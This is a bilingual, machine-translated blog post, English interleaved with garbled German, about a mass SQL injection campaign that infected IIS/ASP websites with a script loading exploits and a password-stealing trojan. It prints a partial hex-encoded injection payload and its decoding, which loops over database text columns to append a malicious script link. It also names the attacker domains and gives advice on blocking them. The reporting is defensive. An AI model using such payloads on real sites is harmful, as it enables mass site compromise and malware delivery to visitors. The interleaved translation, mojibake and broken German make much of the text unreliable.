Mass SQL injections Mass SQL-Injektion
Earlier this week I published a Zu Beginn dieser Woche veröffentlichte ich ein post regarding a vulnerability in several versions of Microsoft Windows Post im Hinblick auf eine Sicherheitslücke in mehreren Versionen von Microsoft Windows …
…Well the vulnerability is now being executed-there is another round of Mass SQL injections going on which has infected hundreds of thousands of websites running on the IIS platform. … Nun, die Lücke wird jetzt ausgeführt-gibt es eine weitere Runde der Masse SQL-Injektionen in die laufenden infiziert hat Hunderttausende von Websites auf dem IIS-Plattform.
Preforming a simple Google search for traces of the malicious script results in over 510,000 modified pages . Durchführen einer einfachen Google-Suche nach Spuren der bösartigen Skript Ergebnisse in über 510000 Seiten geändert.
With more and more websites using a SQL back-end to make them faster and more dynamic, it also means that it’s crucial to verify what information get stored in or requested from those databases - especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms etc. Unless that data is sanitized before it gets saved you can’t control what the website will show to the users. Mit mehr und mehr Websites mit einem SQL-Back-End, damit sie schneller und dynamischer, es bedeutet auch, dass es wichtig zu überprüfen, welche Informationen Sie in beantragt oder von denen Datenbanken - vor allem, wenn Sie ermöglichen dem Benutzer die Inhalte selbst hochladen der geschieht die ganze Zeit in diversen Foren, Blogs, Feedback-Formulare usw., es sei denn, dass die Daten saniert, bevor er gespeichert Sie können nicht kontrollieren, was der Website wird zeigen, dass der Nutzer. This is what SQL injection is all about, exploiting weaknesses in these controls. Das ist es, was "SQL Injection" Alles dreht sich um, Schwächen bei der Nutzung dieser Kontrollen.
Currently the malicious file that is being injected is 1.js however it must be noted that this could change at any stage. Derzeit sind die bösartige Datei, wird injiziert wird 1.js jedoch muss darauf hingewiesen werden, dass dies ändern könnte in jedem Stadium. Visitors to this website are “treated†to 8 different exploits for many windows based applications including AIM, RealPlayer, and iTunes. DO NOT visit sites that link to this site as you are very likely to get infected. Die Besucher dieser Website sind â € œtreatedâ € zu 8 verschiedene Exploits für viele Windows-basierte Anwendungen wie AIM, RealPlayer, und iTunes. NICHT besuchen Websites, die auf dieser Website, wie Sie sind sehr wahrscheinlich infiziert. Trendmicro named the malware toj_agent.KAQ it watches for passwords and passes them back to contoller’s ip. TrendMicro dem Namen der Malware toj_agent.KAQ es Uhren für Passwörter und übergibt sie zurück zu contollerâ € ™ s IP.
In this case the injection code starts off like this (note, this is not the complete code): In diesem Fall wird der Code-Injektion beginnt wie folgt aus (beachten Sie, dies ist nicht der vollständige Code):
   DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x440045004300    4C00410052004500200040005400200076006100720063006800610072    00280032003500350029002C0040004300200076006100720063006800    610072002800320035003500290020004400450043004C004100520045    0020005400610062006C0065005F0043007500720073006F0072002000    43005500520053004F005200200046004F0052002000730065006C0065    0063007400200061002E006E0061006D0065002C0062002E006E006100    6D0065002000660072006F006D0020007300790073006F0062006A0065    00630074007300200061002C0073007900730063006F006C0075006D00    6E00730020006200200077006800650072006500200061002E00690064    003D0062002E0069006400200061006E006400200061002E0078007400    7900700065003D00270075002700200061006E0064002000280062002E    00780074007900700065003D003900390020006F007200200062002E00    780074007900700065003D003300350020006… Which when decoded becomes:    DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor    CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b    where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35    or b…    DECLARE% 20% S @ 20NVARCHAR (4000); SET 20% @ S = CAST (0x440045004300  4C00410052004500200040005400200076006100720063006800610072        00280032003500350029002C0040004300200076006100720063006800  610072002800320035003500290020004400450043004C004100520045  0020005400610062006C0065005F0043007500720073006F0072002000      43005500520053004F005200200046004F0052002000730065006C0065  0063007400200061002E006E0061006D0065002C0062002E006E006100      6D0065002000660072006F006D0020007300790073006F0062006A0065  00630074007300200061002C0073007900730063006F006C0075006D00        6E00730020006200200077006800650072006500200061002E00690064  003D0062002E0069006400200061006E006400200061002E0078007400  7900700065003D00270075002700200061006E0064002000280062002E        00780074007900700065003D003900390020006F007200200062002E00  € 780074007900700065003D003300350020006â | Welche wenn decodiert wird:    declare @ T varchar (255) "@ C varchar (255) DECLARE Table_Cursor    CURSOR für select a.name "b.name aus sysobjects a'syscolumns b    wo a.id = b.id und a.xtype = 'u' und (b.xtype = 99 oder b.xtype = 35    oder Bâ € | What happens as a result? Was geschieht als Folge? It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. Es findet alle Textfelder in der Datenbank und fügt einen Link zu bösartigen JavaScript, damit jede und jeder von ihnen wodurch Ihre Website automatisch angezeigt werden. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code. Also im Wesentlichen, was passierte, war, dass die Angreifer sah für ASP oder ASPX-Seiten mit jeder Art von querystring (ein dynamischer Wert, wie zB einen Artikel-ID, Produkt-ID, et cetera) Parameter und versuchte zu verwenden, daß zum Hochladen ihrer SQL-Injection-Code.
So far three different domains have been used to host the malicious content — nmidahena.com, aspder.com and nihaorr1.com . Bisher sind drei verschiedenen Bereichen verwendet wurden, um die Ausrichtung der schädlichen Inhalten â € "nmidahena.com, aspder.com und nihaorr1.com. There’sa set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Es gibt eine Reihe von Dateien, die geladen wird von diesen Websites, die versucht, mit verschiedenen Exploits installieren Sie eine Online-Gaming-Trojaner. Right now the initial exploit page on all domains are inaccessible but that could change. Im Moment nutzen die ursprüngliche Seite über alle Domains nicht zugänglich sind, aber das könnte sich ändern. So if you’re a firewall administrator we recommend you to block access to them. Also, wenn Sie eine Firewall-Administrator empfehlen wir Ihnen zu blockieren den Zugang zu ihnen.
I would recommend that Administrators block access to hxxp:/www.nihaorr1.com and the IP it resolves to 219DOT153DOT46DOT28 at the edge or border of your network. Ich würde empfehlen, dass Administratoren block Zugang zu hxxp: / www.nihaorr1.com und die IP-löst zu 219DOT153DOT46DOT28 am Rand oder Grenze Ihres Netzwerks.
Info sourced from Info stammen aus f-secure
Written by Patrick S. Read more great feeds at is source Geschrieben von Patrick S. Lesen Sie mehr im großen Feeds ist Quelle WEBSITE WEBSITE
no comments keine Kommentare . .
Read more articles on Lesen Sie mehr Artikel über otherSoftware otherSoftware and und MS News MS-News . .
- [+] Digg [+] Digg : Feature this article : Feature dieser Artikel
- [+] Del.icio.us [+] Del.icio.us : Bookmark this article : Bookmark diesem Artikel
- [+] Furl [+] Furl : Bookmark this article : Bookmark diesem Artikel
